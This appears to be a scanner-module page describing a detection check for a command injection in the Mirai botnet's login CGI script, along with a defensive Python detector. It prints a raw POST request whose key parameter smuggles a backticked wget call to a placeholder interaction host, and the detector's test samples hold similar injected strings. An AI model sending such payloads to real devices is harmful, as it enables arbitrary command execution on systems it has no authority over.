Mirai - Remote Command Injection

By kannthu

Critical
Vidoc Module
#mirai #rce #oast
Description

What is "Mirai - Remote Command Injection"?

The "Mirai - Remote Command Injection" module is designed to detect a critical vulnerability in the Mirai software. Mirai is malware that targets Internet of Things (IoT) devices and turns them into a botnet. This module specifically targets the login CGI script in Mirai, where the "key" parameter is not properly sanitized, leading to a command injection vulnerability. The severity of this vulnerability is classified as critical.

This module was authored by gy741.

Impact

If exploited, this vulnerability allows an attacker to execute arbitrary commands on the affected device. This can lead to unauthorized access, data theft, and potential disruption of services.

How does the module work?

The "Mirai - Remote Command Injection" module works by sending a crafted HTTP request to the target device's login CGI script. The request includes a payload that exploits the command injection vulnerability. Here is an example of the HTTP request:

POST /cgi-bin/login.cgi HTTP/1.1
Host: <Hostname>
Content-Type: application/x-www-form-urlencoded

key=';`wget http://<InteractionURL>`;#

The module also includes a matching condition to determine whether the target device is vulnerable. In this case, it checks that the interaction protocol recorded for <InteractionURL> is HTTP.

If the module detects a match, it will report the vulnerability.
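
A defender-side check for the request shape shown above, as an added example (not part of the Vidoc module or the original page): it flags POSTs to /cgi-bin/login.cgi whose key value carries shell metacharacters, including URL-encoded ones. The function names, the sample requests and the hosts device.example and oast.example are constructed for illustration, and it assumes legitimate key values are plain tokens.

```python
import re
from urllib.parse import parse_qsl

# Assumption: a legitimate `key` value is a plain token, so quotes, command
# separators, backticks, $( ), pipes, redirects and '#' are all suspicious.
SHELL_META = re.compile(r"[;`|&<>'\"#\r\n]|\$\(")
TARGET_PATH = "/cgi-bin/login.cgi"


def parse_request(raw):
    """Split a raw HTTP request into (method, path, body); None if malformed."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return None
    return parts[0].upper(), parts[1].split("?", 1)[0], body.strip()


def suspicious_keys(raw):
    """Return `key` values carrying shell metacharacters in a login.cgi POST."""
    parsed = parse_request(raw)
    if parsed is None or parsed[0] != "POST" or parsed[1] != TARGET_PATH:
        return []
    # parse_qsl URL-decodes each value, so %60 (backtick) or %3B (;) still match.
    return [value for name, value in parse_qsl(parsed[2], keep_blank_values=True)
            if name == "key" and SHELL_META.search(value)]


# Constructed sample requests (oast.example is a placeholder host).
HEAD = ("POST /cgi-bin/login.cgi HTTP/1.1\r\nHost: device.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
SAMPLES = {
    "raw payload": HEAD + "key=';`wget http://oast.example/`;#",
    "url-encoded": HEAD + "key=%27%3B%60wget+http%3A%2F%2Foast.example%2F%60%3B%23",
    "benign login": HEAD + "key=S3cretPass",
    "other path": HEAD.replace("login.cgi", "status.cgi") + "key=';id;#",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(f"{label:13} -> {suspicious_keys(request)}")
```

The same check can run in a reverse proxy or over captured request bodies; any hit on a device that exposes this script warrants review of its outbound connections.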

Module preview

Concurrent Requests (1)
1. HTTP Request template
   Raw request
   Matching conditions
     word: http
Passive global matcher
   No matching conditions.
On match action
   Report vulnerability